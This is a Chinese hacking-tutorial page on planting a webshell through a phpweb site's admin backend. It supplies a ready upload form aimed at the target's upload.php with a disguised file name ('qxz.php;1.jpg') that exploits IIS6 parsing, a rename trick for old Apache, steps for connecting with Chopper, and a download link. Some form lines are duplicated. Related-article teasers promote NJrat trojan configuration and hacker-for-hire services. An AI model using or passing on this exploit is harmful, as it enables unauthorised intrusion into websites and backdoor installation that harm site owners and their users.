phpweb后台拿shell简单 ***
关于phpweb后台拿shell简单 *** 。
首先登录后台admin.php
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
菜刀链接看下
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
代码文件下载地址:http://pan.baidu.com/s/1eRzHs
相关文章
网管系统破解软件是哪里来的?
今日给大伙儿说的是某十四岁中学生,根据qq群通过自学网站渗透一个月,秒破网咖计费系统,这名网络黑客根据网络硬盘免费下载进攻破解软件,不上一分钟時间,在十四岁的小果子(笔名...
![3389远程链接提示:你已经被拒绝登录到终端服务器[解决方案]](2020/05/31/2014030800123793.jpg)
3389远程链接提示:你已经被拒绝登录到终端服务器[解决方案]
这是3389远程桌面的连接界面,当我们连接到服务器准备数据密码登录的时候,提示:你已经被拒绝登录到终端服务器。 【解决方案】: 本地登录服务器,进入...
NJrat木马病毒如何配置?
不久前,有一个事在新浪微博特火的,一名程序猿用了一款姓名叫NJrat的木马病毒反控制了互联网诈骗犯。 用木马病毒来基础学习网络黑客专业知识,会让许多新手有兴趣爱好。 但是许多新手在检测...
黑客技术找手机(成都黑客接单)
技术手机怎么找黑客 1、怎么找黑客exe是。技术手机成都接单就有点夸张了,该片在美国上映以后。41找黑客71。黑客而有些投资者图他的收益,很多程序员写一些可通过网络远程登录到其他pc的后台程序,什么合...
Discuz! X3.1 刷分系列漏洞
在完成任务时(home.php?mod=draw&do=view&id=xx),任务先前的状态缺少判断 完成任务的链接形如: home.php?mod=draw&...
w3af是不是适用全部电脑操作系统?
什么叫w3af? w3af是搜索和开发设计Web程序运行系统漏洞最时兴,灵便和强劲的专用工具之一。它非常容易应用,它出示了数十种开发设计和网页页面评定软件的作用。别人则将其称之为以互联网为管理中心的...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!